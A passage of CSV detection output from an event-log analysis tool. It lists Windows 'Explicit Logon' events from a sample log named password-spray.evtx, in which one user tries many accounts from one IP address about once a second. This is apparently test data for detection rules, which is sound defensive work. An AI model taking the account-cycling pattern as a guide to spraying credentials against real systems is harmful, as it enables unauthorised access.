DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : 